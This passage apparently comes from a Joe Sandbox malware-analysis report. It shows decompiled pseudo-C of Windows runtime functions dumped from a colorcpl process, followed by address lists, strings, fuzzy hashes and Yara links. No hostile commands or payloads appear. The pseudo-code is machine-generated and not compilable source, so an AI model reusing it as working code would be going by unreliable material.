								 *(_t209 - 0x2c) = 0;
								_t184 =  *(_t209 - 0x40);
								__eflags = _t184;
								if(_t184 != 0) {
									 *_t184 = _t150;
								}
								goto L8;
							}
						} else {
							 *(_t209 - 0x2c) = 0xc000008a;
							goto L8;
						}
					}
				}
				L1:
				_t108 = 0x7ffe0385;
				goto L2;
			}

0x0434b5e0
0x0434b5e2
0x0434b5e7
0x0434b5ec
0x0434b5ef
0x0434b5f5
0x0434b5f8
0x0434b5ff
0x0434b608
0x0434b60e
0x0434b611
0x0434b616
0x0434b617
0x0434b61d
0x0434b61e
0x0434b622
0x0434b62b
0x0434b62c
0x0434b630
0x0434b634
0x0434b643
0x0434b648
0x0434b651
0x0434b659
0x0434b65e
0x043a363b
0x043a363d
0x00000000
0x00000000
0x043a364c
0x0434b669
0x0434b66c
0x043a3656
0x043a365b
0x043a3660
0x043a3662
0x043a3674
0x043a3664
0x043a366d
0x043a366d
0x043a367c
0x043a3681
0x0434b672
0x0434b672
0x0434b672
0x0434b679
0x043a3689
0x00000000
0x0434b67f
0x0434b682
0x0434b6e9
0x0434b6e9
0x0434b6ec
0x0434b8ee
0x0434b8f1
0x00000000
0x00000000
0x0434b8f7
0x0434b8f8
0x0434b8fe
0x0434b8ff
0x0434b900
0x0434b905
0x0434b907
0x00000000
0x00000000
0x0434b6c2
0x0434b6c5
0x0434b6d1
0x0434b6d1
0x0434b6f2
0x0434b714
0x0434b716
0x0434b719
0x0434b71b
0x0434b762
0x0434b765
0x0434b768
0x0434b76c
0x0434b8d4
0x0434b8d4
0x0434b8db
0x0434b8de
0x0434b8e0
0x0434b8e2
0x0434b8e2
0x0434b8e4
0x0434b8e6
0x0434b73a
0x0434b73a
0x0434b73e
0x0434b740
0x0434b742
0x0434b744
0x0434b744
0x0434b744
0x0434b747
0x0434b748
0x0434b749
0x0434b74b
0x0434b74c
0x0434b74d
0x0434b74e
0x0434b753
0x0434b753
0x0434b758
0x0434b6a0
0x0434b6a6
0x0434b6ab
0x043a36f3
0x043a36f6
0x00000000
0x00000000
0x043a3705
0x0434b6b6
0x0434b6b9
0x043a370f
0x043a3714
0x043a3716
0x043a3721
0x043a3721
0x043a3721
0x043a372d
0x043a372d
0x0434b6bf
0x00000000
0x0434b6bf
0x0434b6b1
0x0434b6b1
0x00000000
0x0434b6b1
0x0434b772
0x0434b781
0x0434b783
0x043a3695
0x043a369a
0x043a36ad
0x043a36ad
0x0434b72d
0x0434b72d
0x0434b72f
0x043a36eb
0x0434b735
0x0434b735
0x0434b737
0x0434b737
0x00000000
0x0434b72f
0x0434b789
0x0434b78e
0x0434b791
0x0434b797
0x0434b799
0x0434b79b
0x00000000
0x00000000
0x0434b7a1
0x0434b7a3
0x00000000
0x00000000
0x0434b7a9
0x0434b7af
0x0434b7b1
0x0434b7b3
0x00000000
0x00000000
0x0434b7b9
0x0434b7bb
0x00000000
0x00000000
0x0434b7c1
0x0434b7c7
0x0434b7c9
0x0434b7cb
0x00000000
0x00000000
0x0434b7d1
0x0434b7d3
0x00000000
0x00000000
0x0434b7d9
0x0434b7df
0x0434b7e1
0x0434b7e3
0x00000000
0x00000000
0x0434b7e9
0x0434b7eb
0x00000000
0x00000000
0x0434b7f1
0x0434b7f7
0x0434b7f9
0x0434b7fb
0x00000000
0x00000000
0x0434b801
0x0434b803
0x00000000
0x00000000
0x0434b809
0x0434b80f
0x0434b811
0x0434b813
0x00000000
0x00000000
0x0434b819
0x0434b81b
0x00000000
0x00000000
0x0434b821
0x0434b827
0x0434b829
0x0434b82b
0x00000000
0x00000000
0x0434b831
0x0434b833
0x00000000
0x00000000
0x0434b839
0x0434b842
0x0434b844
0x0434b846
0x00000000
0x00000000
0x0434b84c
0x0434b84e
0x00000000
0x00000000
0x0434b854
0x0434b85a
0x00000000
0x00000000
0x0434b860
0x0434b863
0x00000000
0x00000000
0x0434b869
0x0434b870
0x00000000
0x00000000
0x0434b876
0x0434b879
0x0434b87b
0x043a36bb
0x043a36bc
0x043a36c1
0x043a36c3
0x00000000
0x00000000
0x043a36c5
0x0434b889
0x0434b88a
0x0434b88f
0x0434b891
0x00000000
0x00000000
0x0434b89f
0x0434b8a0
0x0434b8a5
0x0434b8a7
0x00000000
0x00000000
0x0434b8ad
0x0434b8b1
0x0434b8d1
0x0434b8d1
0x00000000
0x0434b8d1
0x0434b8b5
0x0434b8b9
0x0434b8be
0x0434b8c0
0x00000000
0x00000000
0x0434b8c6
0x0434b8c9
0x0434b8cb
0x043a36cf
0x043a36d4
0x043a36d6
0x00000000
0x00000000
0x043a36d8
0x00000000
0x0434b8cb
0x0434b71d
0x0434b723
0x0434b725
0x0434b72a
0x0434b72a
0x00000000
0x0434b723
0x0434b68c
0x0434b691
0x0434b697
0x0434b6d4
0x0434b6d6
0x0434b6e6
0x00000000
0x0434b6d8
0x0434b6d8
0x0434b6db
0x0434b6de
0x0434b6e0
0x0434b6e2
0x0434b6e2
0x00000000
0x0434b6e0
0x0434b699
0x0434b699
0x00000000
0x0434b699
0x0434b697
0x0434b679
0x0434b664
0x0434b664
0x00000000

Strings

LdrResGetRCConfig Enter, xrefs: 0434B622
LdrResGetRCConfig Exit, xrefs: 0434B634
MUI, xrefs: 0434B5F8, 0434B707

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID:
String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit$MUI
API String ID: 0-1145731471
Opcode ID: 0c62de59683afd65221146a2e8553b2b03659e0ee3a9e2654fd4f8d74b58d084
Instruction ID: 064982c095aad6d72ab1675454cdac5f4bea879d39811b8d5eea7867890afae4
Opcode Fuzzy Hash: 0c62de59683afd65221146a2e8553b2b03659e0ee3a9e2654fd4f8d74b58d084
Instruction Fuzzy Hash: 1EB17871B507458BEB25CF69C890BADB7B5EF84714F18A829E852EB7A0D734F850CB10

Uniqueness

Uniqueness Score: -1.00%

Function 0433A147 Relevance: 4.0, Strings: 3, Instructions: 238
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E0433A147(signed int* __ecx, char* __edx, signed int _a4) {
				signed int _v12;
				intOrPtr _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				char _v560;
				signed int _v564;
				intOrPtr _v568;
				char _v572;
				intOrPtr _v576;
				short _v578;
				char _v580;
				signed int _v584;
				intOrPtr _v586;
				char _v588;
				char* _v592;
				intOrPtr _v596;
				intOrPtr _v600;
				char* _v604;
				signed int* _v608;
				intOrPtr _v612;
				short _v614;
				char _v616;
				signed int _v620;
				signed int _v624;
				intOrPtr _v628;
				char* _v632;
				signed int _v636;
				char _v640;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t94;
				char _t96;
				char* _t101;
				intOrPtr _t120;
				void* _t121;
				intOrPtr _t125;
				short _t129;
				signed int* _t140;
				intOrPtr _t141;
				intOrPtr _t146;
				intOrPtr _t148;
				intOrPtr _t151;
				signed int _t153;
				signed int _t154;
				void* _t155;
				signed int _t157;

				_t152 = __edx;
				_v12 =  *0x443b370 ^ _t157;
				_v564 = _v564 & 0x00000000;
				_t154 = _a4;
				_t140 = __ecx;
				_v604 = __edx;
				_v608 = __ecx;
				_t153 = 0;
				_v568 = 0x220;
				_v592 =  &_v560;
				if(E04361D10( &_v580, L"UseFilter") < 0) {
					L4:
					return E04384B50(_t90, _t140, _v12 ^ _t157, _t152, _t153, _t154);
				}
				_push( &_v572);
				_push(0x220);
				_push( &_v560);
				_t94 = 2;
				_push(_t94);
				_push( &_v580);
				_push( *_t140);
				_t90 = E04382B00();
				if(_t90 >= 0) {
					if(_v556 != 4 || _v552 != 4 || _v548 == 0) {
						L3:
						_t90 = 0;
					} else {
						_t96 =  *_t154;
						_t154 =  *(_t154 + 4);
						_v588 = _t96;
						_v584 = _t154;
						if(E04361D10( &_v580, L"\\??\\") < 0) {
							goto L4;
						}
						if(E043740F0( &_v560,  &_v580,  &_v588, 1) != 0) {
							_v588 = _v588 + 0xfff8;
							_v586 = _v586 + 0xfff8;
							_v584 = _t154 + 8;
						}
						_t101 =  &_v560;
						_t146 = 0;
						_v596 = _t101;
						_v600 = 0;
						do {
							_t152 =  &_v572;
							_push( &_v572);
							_push(_v568);
							_push(_t101);
							_push(0);
							_push(_t146);
							_push( *_t140);
							_t154 = E04382CD0();
							if(_t154 < 0) {
								goto L37;
							}
							_t148 = _v596;
							_v580 =  *((intOrPtr*)(_t148 + 0xc));
							_v624 = _v624 & 0x00000000;
							_v620 = _v620 & 0x00000000;
							_v578 =  *((intOrPtr*)(_t148 + 0xc));
							_v576 = _t148 + 0x10;
							_v636 =  *_t140;
							_v632 =  &_v580;
							_push( &_v640);
							_push(_v604);
							_v640 = 0x18;
							_push( &_v564);
							_v628 = 0x240;
							_t154 = E04382AB0();
							if(_t154 < 0) {
								goto L37;
							}
							_t154 = E04361D10( &_v580, L"FilterFullPath");
							if(_t154 < 0) {
								L36:
								_push(_v564);
								E04382A80();
								goto L37;
							}
							_t141 = _v592;
							_t120 = _v568;
							do {
								_push( &_v572);
								_push(_t120);
								_push(_t141);
								_t121 = 2;
								_push(_t121);
								_push( &_v580);
								_push(_v564);
								_t155 = E04382B00();
								if(_t155 == 0x80000005 || _t155 == 0xc0000023) {
									if(_t153 != 0) {
										E04353BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t153);
									}
									_t150 =  *((intOrPtr*)( *[fs:0x30] + 0x18));
									if( *((intOrPtr*)( *[fs:0x30] + 0x18)) != 0) {
										_t125 =  *0x4435d78; // 0x0
										_t153 = E04355D90(_t150, _t150, _t125 + 0x180000, _v572);
										if(_t153 == 0) {
											goto L25;
										}
										_t120 = _v572;
										_t141 = _t153;
										_v596 = _t153;
										_v568 = _t120;
										goto L27;
									} else {
										_t153 = 0;
										L25:
										_t154 = 0xc0000017;
										goto L26;
									}
								} else {
									L26:
									_t120 = _v568;
								}
								L27:
							} while (_t154 == 0x80000005 || _t154 == 0xc0000023);
							_v592 = _t141;
							_t140 = _v608;
							if(_t154 >= 0) {
								_t151 = _v592;
								if( *((intOrPtr*)(_t151 + 4)) == 1 &&  *((intOrPtr*)(_t151 + 8)) <= 0xfffe) {
									_t152 = 2;
									_t129 =  *((intOrPtr*)(_t151 + 8)) - _t152;
									_v616 = _t129;
									_v614 = _t129;
									_v612 = _t151 + 0xc;
									if(E043604C0( &_v588,  &_v616, 1) == 0) {
										break;
									}
								}
								goto L36;
							}
							_push(_v564);
							E04382A80();
							_t65 = _t154 + 0x3fffffcc; // 0x3fffffcc
							asm("sbb eax, eax");
							_t154 = _t154 &  ~_t65;
							L37:
							_t101 = _v596;
							_t146 = _v600 + 1;
							_v600 = _t146;
						} while (_t154 >= 0);
						if(_t153 != 0) {
							E04353BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t153);
						}
						if(_t154 >= 0) {
							_push( *_t140);
							E04382A80();
							 *_t140 = _v564;
						}
						_t86 = _t154 + 0x7fffffe6; // 0x7fffffe6
						asm("sbb eax, eax");
						_t90 =  ~_t86 & _t154;
					}
					goto L4;
				}
				if(_t90 != 0xc0000034) {
					if(_t90 == 0xc0000023) {
						goto L3;
					}
					if(_t90 != 0x80000005) {
						goto L4;
					}
				}
				goto L3;
			}

0x0433a147
0x0433a159
0x0433a15c
0x0433a16b
0x0433a16e
0x0433a17c
0x0433a183
0x0433a189
0x0433a18b
0x0433a195
0x0433a1a2
0x0433a1de
0x0433a1ec
0x0433a1ec
0x0433a1aa
0x0433a1ab
0x0433a1b6
0x0433a1b9
0x0433a1ba
0x0433a1c1
0x0433a1c2
0x0433a1c4
0x0433a1cb
0x0439bf43
0x0433a1dc
0x0433a1dc
0x0439bf62
0x0439bf62
0x0439bf64
0x0439bf67
0x0439bf79
0x0439bf86
0x00000000
0x00000000
0x0439bfa3
0x0439bfaa
0x0439bfb1
0x0439bfbb
0x0439bfbb
0x0439bfc1
0x0439bfc7
0x0439bfc9
0x0439bfcf
0x0439bfd5
0x0439bfd5
0x0439bfdb
0x0439bfdc
0x0439bfe2
0x0439bfe3
0x0439bfe5
0x0439bfe6
0x0439bfed
0x0439bff1
0x00000000
0x00000000
0x0439bff7
0x0439c001
0x0439c00c
0x0439c013
0x0439c01a
0x0439c024
0x0439c02c
0x0439c038
0x0439c044
0x0439c045
0x0439c051
0x0439c05b
0x0439c05c
0x0439c06b
0x0439c06f
0x00000000
0x00000000
0x0439c086
0x0439c08a
0x0439c1ba
0x0439c1ba
0x0439c1c0
0x00000000
0x0439c1c0
0x0439c090
0x0439c096
0x0439c09c
0x0439c0a2
0x0439c0a3
0x0439c0a4
0x0439c0a7
0x0439c0a8
0x0439c0af
0x0439c0b0
0x0439c0bb
0x0439c0c3
0x0439c0cf
0x0439c0dd
0x0439c0dd
0x0439c0e8
0x0439c0ed
0x0439c138
0x0439c14f
0x0439c153
0x00000000
0x00000000
0x0439c155
0x0439c15b
0x0439c15d
0x0439c163
0x00000000
0x0439c0ef
0x0439c0ef
0x0439c0f1
0x0439c0f1
0x00000000
0x0439c0f1
0x0439c0f6
0x0439c0f6
0x0439c0f6
0x0439c0f6
0x0439c0fc
0x0439c0fc
0x0439c10c
0x0439c112
0x0439c11a
0x0439c16b
0x0439c175
0x0439c186
0x0439c187
0x0439c18a
0x0439c191
0x0439c19b
0x0439c1b8
0x00000000
0x00000000
0x0439c1b8
0x00000000
0x0439c175
0x0439c11c
0x0439c122
0x0439c127
0x0439c12f
0x0439c131
0x0439c1c5
0x0439c1cb
0x0439c1d1
0x0439c1d2
0x0439c1d8
0x0439c1e2
0x0439c1f0
0x0439c1f0
0x0439c1f7
0x0439c1f9
0x0439c1fb
0x0439c206
0x0439c206
0x0439c208
0x0439c210
0x0439c212
0x0439c212
0x00000000
0x0439bf43
0x0433a1d6
0x0439bf26
0x00000000
0x00000000
0x0439bf31
0x00000000
0x00000000
0x0439bf37
0x00000000

Strings

FilterFullPath, xrefs: 0439C075
\??\, xrefs: 0439BF73
UseFilter, xrefs: 0433A171

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID: InitializeThunk
String ID: FilterFullPath$UseFilter$\??\
API String ID: 2994545307-2779062949
Opcode ID: 44d4aee161ef058cf791e3abc28424a02dfc883f306cc58ecc84deceb12a97f3
Instruction ID: 6c08f1f0c7c7b47f203bb96857e62e4e5d9949f75c76fc78c17eb135ba2b6f9c
Opcode Fuzzy Hash: 44d4aee161ef058cf791e3abc28424a02dfc883f306cc58ecc84deceb12a97f3
Instruction Fuzzy Hash: 52A16D719016299BDF31EF24CC88BAAB7F8EF44714F1051EAE909A7250E735AE84CF50

Uniqueness

Uniqueness Score: -1.00%

Function 043C7090 Relevance: 4.0, Strings: 3, Instructions: 233
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E043C7090(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int _t121;
				signed int _t124;
				signed int _t132;
				signed int _t133;
				signed int _t134;
				signed int _t137;
				signed int _t141;
				signed int _t143;
				signed int _t155;
				signed int _t159;
				signed int _t161;
				signed int* _t164;
				signed int _t171;
				signed int _t173;
				signed int _t174;
				signed int _t175;
				void* _t176;
				signed int _t179;
				void* _t180;
				signed int _t182;
				signed int _t183;
				signed int _t184;
				signed int _t186;
				signed int _t188;
				signed int _t189;
				void* _t190;
				void* _t192;
				short _t193;
				intOrPtr _t195;
				signed int _t199;
				void* _t201;
				void* _t203;
				void* _t205;

				_push(0x6c);
				_push(0x441cd18);
				E04397BE4(__ebx, __edi, __esi);
				 *(_t201 - 0x24) = 0xc0000001;
				_t195 =  *((intOrPtr*)(_t201 + 8));
				 *((intOrPtr*)(_t195 + 0x4c)) =  *((intOrPtr*)( *[fs:0x30] + 0x18));
				_t180 = 4;
				_t164 = E043C79B8(_t195, _t180);
				if(_t164 != 0) {
					 *_t164 =  *_t164 & 0x00000000;
					 *(_t195 + 0x38) = _t164;
					E0434FED0(0x4434800);
					 *(_t201 - 4) =  *(_t201 - 4) & 0x00000000;
					_push(2);
					_t199 = E043E7ABE(_t164, 0x43c7c20, _t195, _t195, __esi, __eflags);
					 *(_t201 - 0x24) = _t199;
					__eflags = _t199;
					if(_t199 < 0) {
						_t82 = _t195 + 0x38;
						 *_t82 =  *(_t195 + 0x38) & 0x00000000;
						__eflags =  *_t82;
						goto L32;
					} else {
						__eflags =  *(_t195 + 0x20) & 0x00000008;
						if(( *(_t195 + 0x20) & 0x00000008) == 0) {
							L32:
							__eflags = _t199;
							if(_t199 >= 0) {
								__eflags =  *(_t195 + 0x20) & 0x00000210;
								if(( *(_t195 + 0x20) & 0x00000210) != 0) {
									 *(_t201 - 0x7c) =  *(_t201 - 0x7c) | 0xffffffff;
									 *(_t201 - 0x78) =  *(_t195 + 0x40);
									 *((intOrPtr*)(_t201 - 0x70)) = E043C8250;
									 *((intOrPtr*)(_t201 - 0x6c)) = _t201 - 0x50;
									__eflags =  *(_t195 + 0x20) & 0x00000010;
									_t124 = 0;
									 *((intOrPtr*)(_t201 - 0x74)) = 3 + (_t124 & 0xffffff00 | ( *(_t195 + 0x20) & 0x00000010) != 0x00000000) * 2;
									asm("stosd");
									asm("stosd");
									asm("stosd");
									asm("stosd");
									 *((intOrPtr*)(_t201 - 0x50)) =  *((intOrPtr*)(_t201 + 8));
									 *(_t201 - 0x4c) = _t164;
									_t106 = _t201 - 0x48;
									 *_t106 =  *(_t201 - 0x48) & 0x00000000;
									__eflags =  *_t106;
									_t108 =  &(_t164[1]); // 0x4
									 *(_t201 - 0x44) = _t108;
									_push(0);
									_push(0x2c);
									_push(_t201 - 0x7c);
									_push(2);
									_push(0);
									_t199 = E043E6EF0(_t164, _t201 - 0x50, _t199,  *_t106);
									goto L35;
								}
							}
						} else {
							_t132 =  *0x4436d3c; // 0x0
							 *(_t201 - 0x2c) = _t132;
							__eflags = _t132;
							if(_t132 == 0) {
								L9:
								_t133 = 0;
								__eflags = 0;
								while(1) {
									 *(_t201 - 0x30) = _t133;
									__eflags = _t133 -  *_t164;
									if(_t133 >=  *_t164) {
										goto L32;
									}
									_t171 = _t133 << 6;
									 *(_t201 - 0x3c) = _t171;
									_t182 =  *(_t195 + 0x40);
									__eflags = _t182;
									if(_t182 == 0) {
										L13:
										_t134 =  *( &(_t164[1]) + _t171);
										 *(_t201 - 0x2c) = _t134;
										_t183 =  *(_t134 + 0x84) & 0x0000ffff;
										 *(_t201 - 0x34) = _t183;
										 *( &(_t164[6]) + _t171) = _t183;
										_t184 = _t183 << 6;
										 *(_t201 - 0x1c) = _t184;
										 *(_t201 - 0x38) = _t184;
										__eflags =  *(_t134 + 0xbc);
										if( *(_t134 + 0xbc) != 0) {
											 *( &(_t164[6]) + _t171) =  *(_t201 - 0x34) + 0x81;
											_t184 = _t184 + 0x2040;
											__eflags = _t184;
											 *(_t201 - 0x1c) = _t184;
											 *(_t201 - 0x38) = _t184;
										}
										_t173 = E043C79B8(_t195, _t184);
										 *(_t201 - 0x20) = _t173;
										__eflags = _t173;
										if(_t173 == 0) {
											goto L7;
										} else {
											E04388F40(_t173, 0,  *(_t201 - 0x1c));
											_t205 = _t203 + 0xc;
											_t174 =  *(_t201 - 0x20);
											_t137 =  *(_t201 - 0x3c);
											 *( &(_t164[0xf]) + _t137) = _t174;
											_t186 =  *( *(_t201 - 0x2c) + 0xbc);
											 *(_t201 - 0x1c) = _t186;
											 *(_t201 - 0x40) = _t186;
											__eflags = _t186;
											if(_t186 != 0) {
												 *((intOrPtr*)( &(_t164[8]) + _t137)) = 0x81;
												 *((intOrPtr*)( &(_t164[9]) + _t137)) = 8;
												_t189 = 0;
												__eflags = 0;
												 *(_t201 - 0x28) = 0;
												_t143 =  *(_t201 - 0x1c);
												while(1) {
													__eflags = _t189 - 0x80;
													if(_t189 > 0x80) {
														goto L26;
													}
													 *_t174 =  *_t143;
													 *((intOrPtr*)(_t174 + 4)) =  *((intOrPtr*)( *(_t201 - 0x1c) + 4));
													 *(_t174 + 8) =  *( *(_t201 - 0x1c) + 8) << 3;
													 *((short*)(_t174 + 0xc)) = _t189 | 0x00008000;
													_t176 = _t174 + 0x10;
													__eflags = _t189;
													if(_t189 != 0) {
														__eflags = _t189 - 0x80;
														if(_t189 >= 0x80) {
															_push(L"VirtualAlloc");
															_t190 = 0x30;
															E04365C3F(_t176, _t190);
														} else {
															_t155 = _t189 << 3;
															__eflags = _t155;
															_push(_t155);
															_push(L"Objects=%4u");
															goto L23;
														}
													} else {
														_push(0x400);
														_push(L"Objects>%4u");
														L23:
														_push(0x30);
														_push(_t176);
														E043C776B();
														_t205 = _t205 + 0x10;
													}
													_t174 =  *(_t201 - 0x20) + 0x40;
													 *(_t201 - 0x20) = _t174;
													_t143 =  *(_t201 - 0x1c) + 0xc;
													 *(_t201 - 0x1c) = _t143;
													 *(_t201 - 0x40) = _t143;
													_t189 =  *(_t201 - 0x28) + 1;
													 *(_t201 - 0x28) = _t189;
												}
											}
											L26:
											E04388C00(_t174,  *((intOrPtr*)( *(_t201 - 0x2c) + 0x88)), ( *( *(_t201 - 0x2c) + 0x84) & 0x0000ffff) << 6);
											_t203 = _t205 + 0xc;
											_t188 = 0;
											__eflags = 0;
											 *(_t201 - 0x28) = 0;
											_t175 =  *(_t201 - 0x20);
											while(1) {
												_t141 =  *(_t201 - 0x2c);
												__eflags = _t188 - ( *(_t141 + 0x84) & 0x0000ffff);
												if(_t188 >= ( *(_t141 + 0x84) & 0x0000ffff)) {
													break;
												}
												 *(_t175 + 8) =  *(_t175 + 8) << 3;
												_t175 = _t175 + 0x40;
												 *(_t201 - 0x20) = _t175;
												_t188 = _t188 + 1;
												 *(_t201 - 0x28) = _t188;
											}
											_t133 =  *(_t201 - 0x30);
											goto L30;
										}
									} else {
										__eflags = _t182 -  *( &(_t164[1]) + _t171);
										if(_t182 !=  *( &(_t164[1]) + _t171)) {
											L30:
											_t133 = _t133 + 1;
											continue;
										} else {
											goto L13;
										}
									}
									goto L36;
								}
								goto L32;
							} else {
								__eflags =  *(_t132 + 0x88);
								if( *(_t132 + 0x88) == 0) {
									goto L9;
								} else {
									_t192 = 0x40;
									_t159 = E043C79B8(_t195, _t192);
									 *(_t201 - 0x1c) = _t159;
									__eflags = _t159;
									if(_t159 != 0) {
										E04388F40(_t159, 0, 0x40);
										_t203 = _t203 + 0xc;
										_t161 =  *(_t201 - 0x2c);
										_t179 =  *(_t201 - 0x1c);
										 *_t179 = _t161;
										 *((intOrPtr*)(_t179 + 4)) =  *((intOrPtr*)(_t161 + 0x40));
										_t193 = 8;
										 *((short*)(_t179 + 8)) = _t193;
										 *_t164 =  *_t164 + 1;
										__eflags =  *_t164;
										goto L9;
									} else {
										L7:
										_t199 = 0xc0000017;
										L35:
										 *(_t201 - 0x24) = _t199;
									}
								}
							}
						}
					}
					L36:
					 *(_t201 - 4) = 0xfffffffe;
					E043C7387();
					_t121 = _t199;
				} else {
					_t121 = 0xc0000017;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t201 - 0x10));
				return _t121;
			}

0x043c7090
0x043c7092
0x043c7097
0x043c709c
0x043c70ac
0x043c70af
0x043c70b4
0x043c70bc
0x043c70c0
0x043c70cc
0x043c70cf
0x043c70d7
0x043c70dc
0x043c70e0
0x043c70ee
0x043c70f0
0x043c70f3
0x043c70f5
0x043c72f6
0x043c72f6
0x043c72f6
0x00000000
0x043c70fb
0x043c70fb
0x043c70ff
0x043c72fa
0x043c72fa
0x043c72fc
0x043c72fe
0x043c7305
0x043c7307
0x043c730e
0x043c7311
0x043c731b
0x043c731e
0x043c7324
0x043c732f
0x043c7337
0x043c7338
0x043c7339
0x043c733a
0x043c733e
0x043c7341
0x043c7344
0x043c7344
0x043c7344
0x043c7348
0x043c734b
0x043c734e
0x043c7350
0x043c7355
0x043c7356
0x043c7358
0x043c735f
0x00000000
0x043c735f
0x043c7305
0x043c7105
0x043c7105
0x043c710a
0x043c710d
0x043c710f
0x043c7159
0x043c7159
0x043c7159
0x043c715b
0x043c715b
0x043c715e
0x043c7160
0x00000000
0x00000000
0x043c7168
0x043c716b
0x043c716e
0x043c7171
0x043c7173
0x043c717f
0x043c717f
0x043c7183
0x043c7186
0x043c718d
0x043c7190
0x043c7194
0x043c7197
0x043c719a
0x043c719d
0x043c71a4
0x043c71ae
0x043c71b2
0x043c71b2
0x043c71b8
0x043c71bb
0x043c71bb
0x043c71c5
0x043c71c7
0x043c71ca
0x043c71cc
0x00000000
0x043c71d2
0x043c71d8
0x043c71dd
0x043c71e0
0x043c71e3
0x043c71e6
0x043c71ed
0x043c71f3
0x043c71f6
0x043c71f9
0x043c71fb
0x043c7201
0x043c7209
0x043c7211
0x043c7211
0x043c7213
0x043c7216
0x043c7219
0x043c7219
0x043c721f
0x00000000
0x00000000
0x043c7227
0x043c722f
0x043c723b
0x043c7245
0x043c7249
0x043c724c
0x043c724e
0x043c725c
0x043c7262
0x043c727c
0x043c7283
0x043c7284
0x043c7264
0x043c7266
0x043c7266
0x043c7269
0x043c726a
0x00000000
0x043c726a
0x043c7250
0x043c7250
0x043c7255
0x043c726f
0x043c726f
0x043c7271
0x043c7272
0x043c7277
0x043c7277
0x043c728c
0x043c728f
0x043c7295
0x043c7298
0x043c729b
0x043c72a1
0x043c72a2
0x043c72a2
0x043c7219
0x043c72aa
0x043c72bf
0x043c72c4
0x043c72c7
0x043c72c7
0x043c72c9
0x043c72cc
0x043c72cf
0x043c72cf
0x043c72d9
0x043c72db
0x00000000
0x00000000
0x043c72dd
0x043c72e1
0x043c72e4
0x043c72e7
0x043c72e8
0x043c72e8
0x043c72ed
0x00000000
0x043c72ed
0x043c7175
0x043c7175
0x043c7179
0x043c72f0
0x043c72f0
0x00000000
0x00000000
0x00000000
0x00000000
0x043c7179
0x00000000
0x043c7173
0x00000000
0x043c7111
0x043c7111
0x043c7118
0x00000000
0x043c711a
0x043c711c
0x043c711f
0x043c7124
0x043c7127
0x043c7129
0x043c713a
0x043c713f
0x043c7142
0x043c7145
0x043c7148
0x043c714d
0x043c7152
0x043c7153
0x043c7157
0x043c7157
0x00000000
0x043c712b
0x043c712b
0x043c712b
0x043c7361
0x043c7361
0x043c7361
0x043c7129
0x043c7118
0x043c710f
0x043c70ff
0x043c7364
0x043c7364
0x043c736b
0x043c7370
0x043c70c2
0x043c70c2
0x043c70c2
0x043c7375
0x043c7381

Strings

Objects>%4u, xrefs: 043C7255
VirtualAlloc, xrefs: 043C727C
Objects=%4u, xrefs: 043C726A

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID:
String ID: Objects=%4u$Objects>%4u$VirtualAlloc
API String ID: 0-3870751728
Opcode ID: a475a810594ed9fae5ae7bf9d04a14440286ba489808bdf952a1d4adc1c74275
Instruction ID: 2c25626664fb51f80e74d61b2558270a5876f8d26dce00abe338ebc5ba58b2a3
Opcode Fuzzy Hash: a475a810594ed9fae5ae7bf9d04a14440286ba489808bdf952a1d4adc1c74275
Instruction Fuzzy Hash: 11915DB0E006169FEB14DF99C880BADB7F1BF48304F14916EE905AB391E775A841CF94

Uniqueness

Uniqueness Score: -1.00%

Function 04369723 Relevance: 3.9, Strings: 3, Instructions: 179
COMMON

Download Yara Rule

C-Code - Quality: 66%

			E04369723(signed int __ecx, void* __edx) {
				char _v4;
				intOrPtr* _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr* _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t49;
				signed int _t50;
				signed int _t60;
				signed int _t69;
				signed int _t70;
				intOrPtr _t79;
				signed int _t82;
				signed int _t83;
				intOrPtr* _t85;
				intOrPtr _t86;
				signed int _t87;
				void* _t88;
				signed int _t89;
				signed int _t93;
				signed int _t99;
				signed int* _t100;
				void* _t102;
				void* _t103;
				signed int _t104;
				intOrPtr* _t105;
				void* _t107;
				signed int _t108;
				intOrPtr* _t110;
				signed int _t112;
				signed int _t113;
				void* _t115;

				_t87 = __ecx;
				_t115 = (_t113 & 0xfffffff8) - 0x14;
				_t110 = __ecx;
				_v16 =  *[fs:0x30];
				_t82 = 0;
				_v12 = __ecx;
				_push(_t103);
				if( *((intOrPtr*)(__ecx + 0x20)) == 0xfffffffc) {
					L9:
					_t13 = _t110 + 0x20;
					 *_t13 =  *(_t110 + 0x20) | 0xffffffff;
					__eflags =  *_t13;
					E0436A4E3(_t82, _t87, _t103, _t110,  *_t13);
					L10:
					__eflags =  *0x44365f0 - _t82; // 0x0
					if(__eflags != 0) {
						_t99 =  *0x7ffe0330;
						_t83 =  *0x4439214; // 0x0
						_t88 = 0x20;
